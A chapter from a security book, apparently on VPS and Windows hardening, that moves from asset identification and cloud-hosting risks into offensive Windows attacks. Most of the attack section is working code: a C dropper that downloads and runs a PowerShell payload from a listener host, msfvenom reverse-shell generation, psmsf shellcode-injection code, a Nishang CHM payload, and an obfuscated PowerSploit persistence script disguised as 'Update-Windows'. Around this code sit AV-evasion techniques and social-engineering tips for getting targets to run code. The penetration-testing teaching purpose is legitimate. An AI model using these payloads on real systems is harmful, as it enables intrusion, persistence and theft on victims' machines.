

7. VPS

If you have the necessary resources, that is knowledge, skill, experience, desire, money, and of course the need for high security, which is becoming more and more important all the time, I usually advocate bringing VPS(s) in-house where you have more control. Most of my work around VPSs is with GNU/Linux instances. Most of the testing in this chapter was performed on Debian instances, usually, but not always, web servers. Unless stated otherwise, the following applies to these types of instances.

1. SSM Asset Identification

Take the results from the higher level Asset Identification found in the 30,000’ View chapter of Fascicle 0. Remove any that are not applicable. Add any newly discovered. Here are some to get you started:

- Ownership. At first this may sound strange, but that is because of an assumption you may have that it is a given that you will always own, or at least have control of, your server(s). I am going to dispel this myth. When an attacker wants to compromise your server(s), they want to do so for a reason. Possibly it is just for kicks, possibly it is for some more sinister reason. They want an asset that presumably belongs to you, your organisation, or your customers. If they can take control of your server(s) (own it, steal it, whatever you want to call the act), then they have a foothold to launch further attacks and gain other assets that do not belong to them. With this in mind, you could think of your server(s) as an asset. On the other hand, you could think of it as a liability. Both may be correct. In any case, you need to protect your server(s) and in many cases take it to school and teach it how to protect itself. This is covered under the SSM Countermeasures section with items such as HIDS and Logging and Alerting.

- Visibility into and of many things, such as:

  - Disk space

  - Disk IO

  - CPU usage

  - Memory usage

  - File integrity and time stamp changes

  - Which system processes are running

  - System process health and responsiveness

  - Current login sessions, and failed attempts

  - What any user is doing on the system currently

  - Network connections

  - Etc

- Taking the confidential business and client information from the “Starting with the 30,000’ view” chapter, here we can concretise these concepts into forms such as:

  - Email, Web, Data-store servers and of course the data on them.

  - You could even stretch this to individuals’ PCs and other devices which may be carrying this sort of confidential information on them. Mobile devices are a huge risk for example (covered in the Mobile chapter of Fascicle 2)

This is probably an incomplete list for your domain. I have given you a start. Put your thinking cap on and populate the rest, or come back to it as additional assets enter your mind.
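To make the visibility asset above a little more concrete, here is a minimal Python sketch, assuming a GNU/Linux host such as the Debian instances used in this chapter. The function names `resource_snapshot` and `file_fingerprint` are hypothetical, and only the standard library is used. It illustrates the kind of data you want visibility of. It is not a substitute for proper monitoring and HIDS tooling.

```python
import hashlib
import os
import shutil


def resource_snapshot(path="/"):
    """Return a few basic disk and CPU load figures for the host."""
    usage = shutil.disk_usage(path)
    # os.getloadavg() is only available on Unix-like systems (assumption: GNU/Linux).
    load_1m, _load_5m, _load_15m = os.getloadavg()
    return {
        "disk_used_percent": round(usage.used / usage.total * 100, 1),
        "disk_free_bytes": usage.free,
        "load_average_1m": load_1m,
        "cpu_count": os.cpu_count(),
    }


def file_fingerprint(path):
    """Return the SHA-256 digest and modification time of a file."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        # Read in chunks so that large files do not need to fit in memory.
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return {"sha256": digest.hexdigest(), "mtime": os.stat(path).st_mtime}


if __name__ == "__main__":
    print(resource_snapshot())
    print(file_fingerprint("/etc/passwd"))
```

Recording a fingerprint at a known good point in time and comparing it later is the basic idea behind file integrity checking. A changed digest or an unexpected modification time is something you want to be alerted about.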

2. SSM Identify Risks

Go through the same process as we did at the top level in Fascicle 0, but for your VPS(s).

- MS Host Threats and Countermeasures

- MS Securing Your Web Server: This is Windows specific, but does offer some insight into technology agnostic risks and countermeasures.

- MS Securing Your Application Server: As above, Microsoft specific, but does provide some ideas for vendor agnostic concepts.

Forfeit Control thus Security

In terms of security, unless your provider is Swiss, you give up so much when you forfeit your system(s) to an external provider. I cover this in my talk “Does Your Cloud Solution Look Like a Mushroom”.

- If you do not own your VPS(s), you will have very limited security, visibility and control over the infrastructure.

- Limited (at best) visibility into any hardening process your CSP takes. Essentially you “Get what you are given”.

- Cloud and hosting providers are in many cases forced by governments and other agencies to give up your secrets. It is very commonplace now and you may not even know that it has happened. Swiss providers may be the exception here.

- What control do you have to ensure that, if your data in the cloud has been compromised, you actually know about it and can invoke your incident response team(s) and procedures?

- Cloud and hosting providers are readily giving up your secrets to government organisations and the highest bidders. In many cases you will not know about it.

- Your provider may go out of business and you may get little notice of this.

- Providers are outsourcing their outsourced services to several providers deep. They do not even have visibility themselves. Control is lost.

- Greater distribution means greater attack surface. Where is your data? Where are your VM images running from? Further distributed on iSCSI targets? Where are the targets?

- Your provider knows little (at best) about your domain, how you operate, or what you have running on their system(s). How are they supposed to protect you if they have no knowledge of your domain?

Windows

Windows exploitation is prevalent, easy and fun, because there is what seems to be a never ending source of security defects. I am not going to attempt to cover much, as I would be here for too long, and this book series is more focussed on giving you a broad understanding with examples as we go.

The problem is not so much that there is a never ending source of defects in Windows, but rather, that the platform was not designed with openness as a core attribute. Because of its closed nature, hardening the platform in many cases is very difficult and often comes down to applying band-aids over top of the defects rather than being able to remove them.

If you want a platform whose security you can have a decent level of control over, do not buy into closed offerings.

PsExec

PsExec was written by Mark Russinovich as part of the Sysinternals tool suite. PsExec allows you to execute programs on remote Windows systems without having to install anything on the server you want to manage or hack. It also serves as a Telnet replacement.

PsExec requires a few things on the target system:

- The Server Message Block (SMB) service must be available and reachable (not blocked by a firewall for example)

- File and Print Sharing must be enabled

- Simple File Sharing must be disabled

- The Admin$ share (which maps to the Windows directory) must be available and accessible; test it first

- The credentials supplied to the PsExec utility must have permissions to access the Admin$ share
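From a defender’s point of view, the first requirement in the list above is also the simplest to audit on hosts you administer. The following is a minimal Python sketch, assuming the conventional SMB port of TCP 445. The function name `smb_reachable` and the example address are hypothetical, and a successful TCP connection says nothing about the remaining requirements (shares, credentials).

```python
import socket


def smb_reachable(host, port=445, timeout=3.0):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, unreachable hosts and timeouts.
        return False


if __name__ == "__main__":
    # 192.0.2.10 is a documentation address (RFC 5737); substitute a host you administer.
    print(smb_reachable("192.0.2.10", timeout=1.0))
```

If this returns True from a network segment that has no business talking SMB to the host, the firewall rules deserve a closer look.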

There are several behavioural techniques, or targets as Metasploit calls them, for the psexec module. In this case we use the Native Upload Target, but with a custom compiled payload (set exe::custom), as you can see in The Play below. What happens here is that our payload is embedded into a Windows Service executable within the PsExec executable, which is then deployed to the Admin$ share on the target machine. The DCE/RPC interface is then used over SMB to access the Windows Service Control Manager (SCM) API. PsExec then starts its Windows Service on the target machine. This service then creates a named pipe which can be used to send commands to the system.

The Metasploit psexec module (exploit/windows/smb/psexec) uses basically the same principle. This was the first of the “Pass The Hash” suite of Metasploit modules, first committed on 2007-07-03.

The following attack was the last of five that I demonstrated at WDCNZ in 2015. The previous demo of that series will provide some additional context and it is probably best to look at it first if you have not already.

You can find the video of how it is played out at http://youtu.be/1EvwwYiMrV4.

Just before the Synopsis, I mentioned that there were several behavioural techniques for the psexec module. One of the other techniques, called “MOF Upload Target”, is to use Managed Object Format (MOF) files, which use C++ syntax. These MOF files must be compiled and are then consumed by Windows Management Instrumentation (WMI). This works quite differently: psexec does not execute anything, all it does is upload your executable to SYSTEM32, and a MOF file to SYSTEM32\wbem\mof\. When Windows receives the event for the new MOF file, it compiles and executes it, which tells Windows to run the payload in SYSTEM32. Metasploit’s MOF library only works with Windows XP and Server 2003. There is also the same high chance of getting sprung by AV, although you can carry out similar tricks as we did above to get around the AV signatures.

If you are running a penetration test for a client and your target’s AV fires, then it could be game over for you. There are better options that exist now that are less likely to ring alarm bells with your target.

Pass The Hash (PTH) suite of Metasploit Modules

We have just detailed and demonstrated the first of the Metasploit PTH suite above. Kali Linux also has the “Pass the Hash toolkit” (with all tools prefixed with “pth-”). The following are the rest of the Metasploit PTH modules in order of when they were introduced. All of the PTH suite except psexec_ntdsgrab depend on CVE-1999-0504. They also all make use of the PsExec utility except the last one, wmi. You will notice that some of these are exploits and some are technically auxiliary modules. As you read their descriptions, you will understand why.

- current_user_psexec (2012-08-01) exploit/windows/local/current_user_psexec: “PsExec via Current User Token”

  1. This module uploads an executable file to the victim system, then creates a share containing that executable

  2. It then creates a remote service on each target system similar to the psexec module, using a UNC path to the file on the victim system. This is essentially a pivot, or lateral movement

  3. It then starts the service(s) on the target hosts, which run the executable from step 1. The reason the service(s) on the target(s) can be placed and run is that we are using the victim’s legitimate current session’s authentication token to pivot to the target(s). We do not need to know the credentials for the target(s)

  You are going to want to run ss to find out which system(s), if any, the administrator is connected to, ideally something important like a Domain Controller. From the victim, you can compromise many targets using the same administrator’s authentication token.

  This is a local exploit. It has to be run from an already compromised administrator that you have a Meterpreter session on (a reverse shell for example) against your target. This is where the pivot occurs

- psexec_command (2012-11-23) auxiliary/admin/smb/psexec_command: “Microsoft Windows Authenticated Administration Utility”

  This module passes the valid administrator credentials, then executes a single arbitrary Windows command on one or more target systems, using a similar technique to the PsExec utility provided by Sysinternals. This will not trigger AV as no binaries are uploaded; we are simply leveraging cmd.exe. It also does not provide a Meterpreter shell, however, and concatenating commands with ‘&’ does not work

- psexec_loggedin_users (2012-12-05) auxiliary/scanner/smb/psexec_loggedin_users: “Microsoft Windows Authenticated Logged In Users Enumeration”

  This module passes the valid administrator credentials, then, using a similar technique to that of the PsExec utility, queries the HKU base registry key on the remote machine with reg.exe to get the list of currently logged in users. Notice this is a scanner module, so it can be run against many target machines concurrently

- psexec_psh (2013-01-21) exploit/windows/smb/psexec_psh: “Microsoft Windows Authenticated Powershell Command Execution”

  This module passes the valid administrator credentials as usual, then attempts to execute a PowerShell payload using a similar technique to the PsExec utility. This method is far less likely to be detected by AV because PowerShell is native to Windows, each payload is unique (it is your script, simply base64 encoded) and so more likely to escape signature based detection, and it never gets written to disk. It is executed from the command line using the -encodedcommand flag and provides the familiar Meterpreter shell

  - “A persist option is also provided to execute the payload in a while loop in order to maintain a form of persistence.”

  - “In the event of a sandbox observing PowerShell execution, a delay and other obfuscation may be added to avoid detection.”

  - “In order to avoid interactive process notifications for the current user, the PowerShell payload has been reduced in size and wrapped in a PowerShell invocation which hides the window entirely.”

- psexec_ntdsgrab (2013-03-15) auxiliary/admin/smb/psexec_ntdsgrab: “PsExec NTDS.dit And SYSTEM Hive Download Utility”

  Similar to SmbExec that we set up in the Tooling Setup chapter of Fascicle 0, this Metasploit module authenticates to an Active Directory Domain Controller and creates a volume shadow copy of the %SYSTEMDRIVE% using a native Windows tool “vssadmin” (visible in the source). It then pulls down copies of the NTDS.dit file as well as the SYSTEM registry hive and stores them. The NTDS.dit and SYSTEM registry hive copy can be used in combination with other tools for offline extraction of AD password hashes. All of this is done without uploading a single binary to the target host.

  There are additional details around where NTDS.dit fits into the picture in the Windows section of the Web Applications chapter.

  Unlike SmbExec, we have to parse the files that psexec_ntdsgrab downloads for us with a separate tool, also discussed briefly in the Windows section of the Web Applications chapter

- wmi (2013-09-21) exploit/windows/local/wmi: “Windows Management Instrumentation (WMI) Remote Command Execution”

  Before we cover the Metasploit module, let’s gain a little more understanding around what WMI is, when it was introduced, how widespread its consumption is, etc.

  Windows NT 4.0 (1996-07-29): During this time period, Microsoft released an out-of-band WMI implementation that could be downloaded and installed. Since then Microsoft has consistently added WMI providers.

  WMI core components are present by default in all Windows OS versions from Windows 2000 onwards. Previous Windows releases can run WMI, but the components have to be installed.

  Windows Server 2008 included the minimalistic Server Core: smaller codebase, no GUI (less attack surface).

  Windows Server 2012 added the ability to switch between GUI and Server Core.

  Windows Server 2016 added Nano Server to the mix of options. Nano Server has what they call a minimal footprint and is headless. It excludes the local GUI, and all management is carried out via WMI, PowerShell, and Remote Server Management Tools (a collection of web-based GUI and command line tools). In Technical Preview 5 (2016-04-17), the ability to manage locally using PowerShell was added. We see a continued commitment to support these tools going forward, so they will continue to be excellent attack vectors and play an important part in the attacker’s toolbox and attack surface.

  WMI Providers provide interfaces for configuring and monitoring Windows services, along with programming interfaces for consumption via custom built tools.

  WMI needs to be accessible for remote access, and there are step(s) to make sure this is the case. These step(s) vary according to the specific Windows release and other configurations.

  Rather than relying on SMB via the psexec technique, starting a service on the target, the wmi module executes PowerShell on the target using the current user credentials or those that you supply, so this is still a PTH technique. We use the WMI Command-line (WMIC) to start a Remote Procedure Call on TCP port 135 and an ephemeral port, then create a ReverseListenerComm to tunnel traffic through that session

PowerShell

By default, PowerShell is installed on Windows Server 2008 R2 and Windows 7 onwards.

PowerShell “is going to be on all boxes and it is going to provide access to everything on the box”. This is excellent news for penetration testers and other attackers!

On Windows Server from PowerShell 4.0 onwards (Windows 8.1, Server 2012 R2), the default execution policy is RemoteSigned, but that is easily overridden in a script as you will see soon. We:

- Have full direct access to the Win32 API

- Have full access to the .Net framework

- Can assemble malicious shell code in memory without AV detection

Then you just need to get some code run on your target’s machine. There are many ways to achieve this. Off the top of my head:

- Find someone that your target trusts and become (pretext) them. Services like LinkedIn are good for this, as they will generally allow you to piece the organisation’s structure together with freely available OSINT that will not ring any alarm bells. It is pretty easy to build a decent replica of the organisation’s trust structure this way. Then you will have implicit trust. They will run your code or open your office document

- Just befriend your target, or someone close enough to your target inside the target organisation, and have them run your code once they trust you. Then traverse once you have persistence on their machine

- Find someone that usually sends files or links to files via email or similar and spoof the from address as discussed in the People chapter.

- CD, DVD, USB stick drops, etc.

- Using existing credentials you obtained by any of the means detailed in the People chapter and maybe logging into Outlook Web Access (OWA) or similar. Most people still use the same or similar passwords for multiple accounts. You only need one of them from someone on the target’s network.

Office files or PDFs generated by Metasploit or setoolkit usually trigger AV, but this is much easier to get around with PowerShell.

Traditionally the payload would have to be saved to the target’s file system, but with PowerShell and other scripting languages, the payload can remain in memory, which defeats many AV products along with HIDS/HIPS. AV vendors continue to get better at detecting malware that is compiled to native assembly, but they struggle to interpret the intent of scripts, as it is so easy to change a script while keeping its intent the same. To make matters worse, PowerShell is now tightly integrated with the Windows operating systems.

So what we are doing is making our viruses and payloads look like chameleons or business as usual (BAU), to detection mechanisms.
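The reason exact signatures struggle with scripts can be shown with a harmless example. The following is a minimal Python sketch, assuming a naive detection mechanism that fingerprints a script by hashing its text. Real AV engines are more sophisticated than this, and the two sample PowerShell strings and the function name `signature` are made up for illustration.

```python
import hashlib


def signature(script):
    """Return a naive 'signature' for a script: the SHA-256 of its text."""
    return hashlib.sha256(script.encode("utf-8")).hexdigest()


# Two scripts with identical behaviour; only a variable name differs.
original = "$greeting = 'hello'; Write-Output $greeting"
renamed = "$g = 'hello'; Write-Output $g"

if __name__ == "__main__":
    print(signature(original))
    print(signature(renamed))
    print("Signatures match:", signature(original) == signature(renamed))
```

Both scripts do exactly the same thing, yet a trivial rename produces a completely different fingerprint. A detection mechanism keyed on the first would not recognise the second.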

PowerShell Exploitation via Executable C/- Psmsf

Meterpreter is an excellent platform for attacking with. It provides us with many useful tools which make tasks like privilege escalation, establishing persistence, lateral movement, pivoting, and others, much easier.

The shellcodes available in psmsf are the following msfvenom payloads, of which we use the second in this play:

- windows/shell/reverse_tcp

- windows/meterpreter/reverse_tcp

- windows/meterpreter/reverse_http

You can find the video of how this attack is played out at https://youtu.be/a01IJzqYD8I.

If you do not already have psmsf on your attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.

#include <stdio.h>

#include <stdlib.h>

int main()

{

// Once the following line has executed, we will have our shell.

// system executes any command string you pass it.

// noprofile causes no profile scripts to be loaded up front.

// Set executionpolicy to bypass will enable script execution for this session, telling PS

// to trust that you know what you are doing in downloading -> running scripts.

// Invoke the EXpression: download the payload and execute it.

// Providing the payload does not trigger anti-virus, this should not.

system("powershell.exe -noprofile -executionpolicy bypass \"IEX ((new-object net.webclient)\

.downloadstring('http://<listener-attack-ip>/payload.txt '))\"");

// Add content here to make your target think this is a legitimate helpful tool.

// Or just do nothing and you may have to explain to your target that it is broken.

// Add the following if you want the terminal to stay open.

//char buff[10];

//fgets (buff, sizeof(buff), stdin);

}

PowerShell Payload creation details

When psmsf is run as per above, the Metasploit windows/meterpreter/reverse_tcp shellcode is generated by running msfvenom programmatically as follows:

LHOST=<listener-ip> LPORT=4444 StagerURILength=5 StagerVerifySSLCert=false --encoder x86/shikata_ga_nai --arch x86 --platform windows --smallest --format c

# msfvenom --help-formats # Lists all the formats available with description.

# msfvenom --list encoders # Lists all the encoders available with description.

psmsf then takes the generated output and in a function called extract_msf_shellcode strips out the characters that do not actually form part of the raw shellcode, like an assignment to a char array, double quotes, new lines, semicolons, white space, etc, and just leaves the raw shellcode.

psmsf then replaces any instances of \x with 0x.

psmsf then passes the cleaned up reverse_tcp shellcode to a function called generate_powershell_script that embeds it into a PowerShell script that is going to become the main part of our payload.

That code looks like the following. I have added the annotations to help you understand how it works:

def generate_powershell_script(shellcode):

shellcode = (

# Assign a reference to the string that is the C# signature of the VirtualAlloc,

# CreateThread, and memset function... to $c.

# Assign a reference to the string that starts immediately before $c and finishes at

# the end of the Start-sleep command... to $1.

"$1 = '$c = ''"

# Import the kernel32.dll that has the native VirtualAlloc function we later use

# to provide us with the starting position in memory to write our shellcode to.

"[DllImport(\"kernel32.dll\")]"

"public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocatio\

nType, uint flProtect);"

"[DllImport(\"kernel32.dll\")]"

"public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, In\

tPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"

"[DllImport(\"msvcrt.dll\")]"

"public static extern IntPtr memset(IntPtr dest, uint src, uint count);"

"'';"

# Add the VirtualAlloc, CreateThread, and memset functions, whose C# signatures we

# assigned to $c, to the PowerShell session as static methods

# of a class that Add-Type is about to create on the fly.

# Add-Type uses Platform Invoke (P/Invoke) to call the VirtualAlloc and CreateThread

# functions from kernel32.dll, and memset from msvcrt.dll, as required.

# The Name and namespace parameters are used to prefix the new type. passthru is used

# to create an object that represents the type which is then assigned to $w

"$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;"

# Create Byte array and assign our prepped reverse_tcp shellcode.

"[Byte[]];[Byte[]]"

"$z = %s;"

"$g = 0x1000;"

"if ($z.Length -gt 0x1000){$g = $z.Length};"

# Let the system choose the address (first parameter 0) within the virtual address

# space of the calling process (which will be a PowerShell instance),

# commit 0x1000 bytes of zero-initialised memory (physical pages are only allocated

# on first access, which happens when we memset below),

# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366887(v=vs.85).aspx

# & set execute, read and write access (PAGE_EXECUTE_READWRITE, 0x40) on the committed region of pages.

# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366786(v=vs.85).aspx

# Essentially just allocate some (all permissions) memory in the PowerShell process

# that is executing this & assign the base address of the allocated memory to $x.

"$x=$w::VirtualAlloc(0,0x1000,$g,0x40);"

# Copy, one byte at a time, the shellcode that $z references

# (the (reverse shell) shellcode that msfvenom gives us)

# into the allocated memory that $x points to.

"for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};"

# Create a thread to execute within the virtual address space of the calling PowerShell

# (which happens on the last line).

# The third parameter represents the starting address of the thread,

# the shellcode to be executed by the thread.

# Setting the fifth parameter to 0 declares that the thread should run

# immediately after creation.

# https://msdn.microsoft.com/en-us/library/windows/desktop/ms682453(v=vs.85).aspx

"$w::CreateThread(0,0,$x,0,0,0);"

# Start-sleep just provides some time for the shellcode (reverse shell) to execute.

"for (;;){Start-sleep 60};';"

# The last single quote above is the end of the string that is assigned to $1.

# $e is assigned the base 64 encoded string that $1 references.

"$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));"

"$2 = \"-enc \";"

# Check if the current process is 64 bit (8 bytes), or something else (32 bit assumed),

# then Invoke EXpression (at specific 64 bit path or 32 bit) PowerShell with base64

# encoded $e, which references the now base64 encoded string (most of this script).

"if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + \"\syswow64\WindowsPowerShell\\v1.0\powe\

rshell\";iex \"& $3 $2 $e\"}else{;iex \"& powershell $2 $e\";}"

% shellcode

)

return shellcode

psmsf is licensed under the BSD License.
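The final branch of the script above decides which PowerShell binary to launch by checking the pointer size of the current process: 8 bytes means a 64 bit process, anything else is assumed to be 32 bit. The same check can be expressed in Python. This is a minimal sketch for illustration only and is not part of psmsf. The function names are hypothetical.

```python
import struct


def pointer_size_bytes():
    """Return the size in bytes of a native pointer in this process."""
    return struct.calcsize("P")


def is_64_bit_process():
    """Mirror the [IntPtr]::Size -eq 8 test used in the PowerShell script."""
    return pointer_size_bytes() == 8


if __name__ == "__main__":
    print("Pointer size in bytes:", pointer_size_bytes())
    print("64 bit process:", is_64_bit_process())
```

The check matters in the script because the shellcode was generated for the x86 architecture, so on a 64 bit system it is handed to the 32 bit PowerShell under syswow64.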

The powershell_hacking.bat that we copy to our web hosting directory as payload.txt is the content of the shellcode variable returned above, after it has been utf_16_le encoded and then base64 encoded. This occurs in the generate_powershell_command function as follows:

# Gives us powershell_hacking.bat

shellcode = base64.b64encode(shellcode.encode('utf_16_le'))

return "powershell -window hidden -enc %s" % shellcode
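The encoding step is easy to reverse, which is useful when you find an encoded command in your logs and want to know what it does. The following is a minimal Python 3 sketch of both directions, using a harmless string. The function names `encode_for_enc` and `decode_enc` are hypothetical. Note that under Python 3, base64.b64encode returns bytes, so the result has to be decoded to a string before it is formatted into a command line. The psmsf snippet above appears to have been written for Python 2, which is an assumption on my part.

```python
import base64


def encode_for_enc(script):
    """Encode a script the way PowerShell's -enc flag expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf_16_le")).decode("ascii")


def decode_enc(blob):
    """Reverse the encoding so that an encoded command can be inspected."""
    return base64.b64decode(blob).decode("utf_16_le")


if __name__ == "__main__":
    sample = "Write-Output 'hello'"
    encoded = encode_for_enc(sample)
    print(encoded)
    print(decode_enc(encoded))
```

Because each character becomes two bytes in UTF-16LE, encoded PowerShell commands written in ASCII have a recognisable pattern, with every second byte being zero before the base64 step.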

PowerShell Exploitation Evolution

After working with PowerShell exploitation for a few weeks, what quickly becomes apparent is how powerful, easy and effective exploitation and post-exploitation is with the PowerShell medium. There are many tools and modules available to use. Often some will not quite work, then you will find a similar variant that someone has taken and improved that does the job adequately. For example, the attack I just demonstrated was based on the Trustedsec unicorn.py, which did not quite work for me. Then upstream of unicorn is Invoke-Shellcode.ps1 of the PowerShellMafia PowerSploit project, which looks to be in good shape. Matt Graeber’s technique of injecting a given shellcode into the running instance of PowerShell is the common theme running through the PowerShell shellcode injection exploits used in a number of projects. Matt blog posted on this technique in 2011, and it is very similar to what we just used above with Psmsf. The landscape is very fluid, but there are always options, usually without requiring any code modifications.

The Veil-Framework’s Veil-Evasion has a similar set of payloads that @harmj0y blog posted on. Kevin Dick also wrote a decent blog post on these.

Problems with the other payloads

When I tested the payload generated by version 7.4.3 of setoolkit via the following menu path, it did not work. This may have been fixed in a later version:

1) Social Engineering Attacks -> 9) Powershell Attack Vectors -> 1) Powershell Alphanumeric Shellcode Injector

PowerShell Exploitation via Office Documents C/- Nishang



Running an executable or convincing your target to run it works in many cases, but other options like office documents can work well also. Nishang is a framework and collection of scripts and payloads that empower us to use PowerShell for all phases of penetration testing. Amongst the many goodies in Nishang is a collection of scripts which can create office documents such as Word, Excel, CHM and a handful of others.

I have not provided a video with this play as it is very similar to the previous one.

If you do not already have nishang on your Windows attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.

# The command to create the CHM:

Out-CHM -PayloadScript C:\Users\kim\Desktop\persistentFetchRunPayload.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

# persistentFetchRunPayload.ps1 contains the following:

IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/payload.txt '))

Adding Persistence C/- Meterpreter

Metasploit had a Meterpreter script called persistence.rb that could create a persistent reverse shell (one that survives reboots and most other actions a user will take). These scripts are no longer supported. If you try to use it, you will probably get an error like: “windows version of Meterpreter is not supported with this Script”

Now the exploit/windows/local/persistence module is recommended for persistence. AV picks this up on reboot though, so you probably will not get far with this.

Adding Persistence C/- PowerSploit

We can do better than Meterpreter. PowerSploit has a module called Persistence, and that is what we use in this play. This adds persistence to the PowerShell one liner that was embedded in the psmsf virus we created above, namely download-payload-execute, and also used in the office document attack with nishang. The one liner was:

IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/payload.txt '))

I had a play with the nishang Add-Persistence.ps1 script, which may be useful for creating post-exploitation persistence, but I was looking for a solution to create an atomic persistent exploit, which is what PowerSploit provides.

You can find the video of how this attack is played out at https://youtu.be/al9RX40QuXU.

If you do not already have PowerSploit on your Windows attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.

function Update-Windows{

Param([Switch]$Persist)

$ErrorActionPreference='SilentlyContinue'

# The encoded string is the contents of persistentFetchRunPayload.ps1 encoded.

$Script={sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStr\

eam][Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqB\

ymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8izk5/73Rra5lfbVeTn86nb\

brM2/FVPpmWRb5s74xn1dWyrLJZ09bF8mLr43nbrh7dvbv7cG+8++nBeGe8u3d3lV2jybh916Yf37nz/wA='),[IO.Com\

pression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()}

if($Persist){

if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).\

IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))

{$Prof=$PROFILE.AllUsersAllHosts;$Payload="schtasks /Create /RU system /SC HOURLY /TN Updater\

/TR `"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`""}

else

{$Prof=$PROFILE.CurrentUserAllHosts;$Payload="schtasks /Create /SC HOURLY /TN Updater /TR `"$\

($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`""}

mkdir (Split-Path -Parent $Prof)

(gc $Prof) + (' ' * 600 + $Script)|Out-File $Prof -Fo

iex $Payload|Out-Null

Write-Output $Payload}

else

{$Script.Invoke()}

} Update-Windows -Persist

powershell -E "cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByA\

GUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQ\

BTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADo\

ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcANwBiADAASABZAEIAeABKAGwAaQBVAG0ATAAyADMASwBl\

ADMAOQBLADkAVQByAFgANABIAFMAaABDAEkAQgBnAEUAeQBUAFkAawBFAEEAUQA3AE0ARwBJAHoAZQBhAFMANwBCADEAc\

ABSAHkATQBwAHEAeQBxAEIAeQBtAFYAVwBaAFYAMQBtAEYAawBEAE0ANwBaADIAOAA5ADkANQA3ADcANwAzADMAMwBuAH\

YAdgB2AGYAZQA2AE8ANQAxAE8ASgAvAGYAZgAvAHoAOQBjAFoAbQBRAEIAYgBQAGIATwBTAHQAcgBKAG4AaQBHAEEAcQB\

zAGcAZgBQADMANQA4AEgAegA4AGkAZgB1AFAAawBmAEwAMgBjAHQAawBXADEAVABMADkAYQB6AGIASQAyADMALwA1AHUA\

cwBaAHgAVgBWADgAMAB2AC8AbwAyAFQAbAAxAG0AZABMAGIAYQArADkALwBxAHEAYQBLAGYAegA3AC8AOQB1AEwALwBPA\

DYASwBaAHIAMgB6AG0AKwBjAC8ARwA2AG4AZABWADMAVgB4AC8AegBhAHkAegBvAC8AegArAHQAOABPAGMAMAAvACsALw\

BoADEAVQBlAGIATAB0AHIAdwArAHEAWgBaAHQAcwBWAHoAbgBIADEAUABUADEAOQBPADYAVwBMAFcAZgAvAGUASQBtAEs\

AOQBNAHMAZgBaAEYAZgBiAFgAOAA1ACsAZQBsADgAMgBoADQAVwArAGIAdQB0AEwARAAzADcAYwB2AHkANgByAGYATgBz\

ADgAUwByAFAAWgBuAG0AOQBKAFIAKwBkAFYASQB0AFYAbgBUAGMATgB3AFIAOAAvAHoAYwA5AEwAdwBrAHQAYQBiAFgAM\

gBQAHYAdgAwAGkAWAAxAFQAMQB0AFgAegB3AC8AZQA5AFIAWgA1AGQANQAzAFgANwAvADAAYQBOAG4AZABiAFYANABrAG\

oAWAA1AHAALwB2ADAAWABiAEcAOAAyAFAAcgA0AHcAVwBUAG4AMgA3AC8AUABrADMAZgBmAEsAWQB1AHYARgBzAC8AMwA\

3AHYAMQBlACsAYgAyAEgAdgA5AGYARAByACsAcgBmAGUALwAvAGIAcgArAGMAbgBaADAAOAB1AFQAcQAvAGYALwBEADUA\

dgBUADQAOQAvADQAcwBFAFgAbgA1AC8AOQBJAE0AOQBlAFAAMwBpAHkAdQAzAHAAMQAvAGMAWABxAEYAMQAzAC8AbwBpA\

GYAWABpADUALwA4ADcAawAvADkANQBPADcAaQAyAGQAdQBuAFgAegB6ADQAcQBiADIARABoAHcALwB2AFAAMwBqAHcANA\

BOADYAOQBlADgAdgBMAHkAOAB2AHoALwBOAE0AdgA3ACsAOQArACsAWgAyADcANQArAGQAMwBmAC8AQgB3ACsAbABPAEw\

AbgAzAGcAeQBlAFQAbgA1AGsAdgByADkAegByAEwANAAvAFAAZwBYAE4AUgBmAG4ATAArAC8AZABQAC8AagAyAEQAdwA2\

AEsASAA3AHkAOQBmAC8AZgBCAHYAVgBkADEAZAByADgAOABuAC8AeABrAC8AbQBaADUAOABPAGwAeQBNAHEAbQAvADIAT\

